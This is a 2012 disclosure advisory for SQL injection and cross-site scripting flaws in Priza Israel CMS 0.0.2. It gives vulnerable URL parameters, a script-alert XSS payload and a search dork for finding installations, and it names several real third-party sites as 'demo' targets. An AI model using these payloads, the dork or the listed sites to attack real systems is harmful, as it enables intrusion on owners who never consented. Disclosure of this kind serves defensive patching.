Priza Israel CMS 0.0.2 Cross Site Scripting / SQL Injection

2012.01.07
Credit: BHG Security Center
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
Dork: intext:\"Powered by Priza\"

# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability # Date: 2012-01-05 [GMT +7] # Author: BHG Security Center # Software Link: http://www.priza.co.il/ # Vendor Response(s): They didn't respond to the emails. # Dork: intext:"Powered by Priza" # Version : [0.0.2] # Tested on: ubuntu 11.04 # CVE : - # Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com) ----------------------------------------------------------------------------------------- Priza Israel Cms SQL Injection / XSS Multiple Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center Date : 2012-01-05 Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi] ~ [PoC] ~: /website_path/index.asp?page_id=[SQLi] ~ [PoC] ~: /website_path/volumes.asp?id=18 ~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss] ~~~~~~~~ Exploit ~ [PoC] ~: Http://[victim]/path/index.asp?p_id=201&id=[SQLi] ~ [PoC] ~: Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script> Demo URL: ~~~~~~~~~ ~~~~~~~ SQL Injection Demo - http://www.dinablich.co.il/website_en/index.asp?p_id=201&id=24' - http://www.jerusalem-crown.co.il/website_en/index.asp?page_id=7' - http://partialanswers.huji.ac.il/volumes.asp?id=18' ~~~~~~~ XSS Demo - http://www.telad-mobile.com/website/index.asp?action=find&page_id=28&string="><script>alert(0)</script> Timeline: ~~~~~~~~~ - 02 - 01 - 2012 bug found. - 03 - 01 - 2012 vendor contacted, but no response. - 05 - 01 - 2012 Advisories release. Important Notes: ~~~~~~~~~ - Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in - the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. --------------------------------------------------------------------------- Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ -------------------------------- [ EOF ] ----------------------------------

References:

http://www.priza.co.il/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top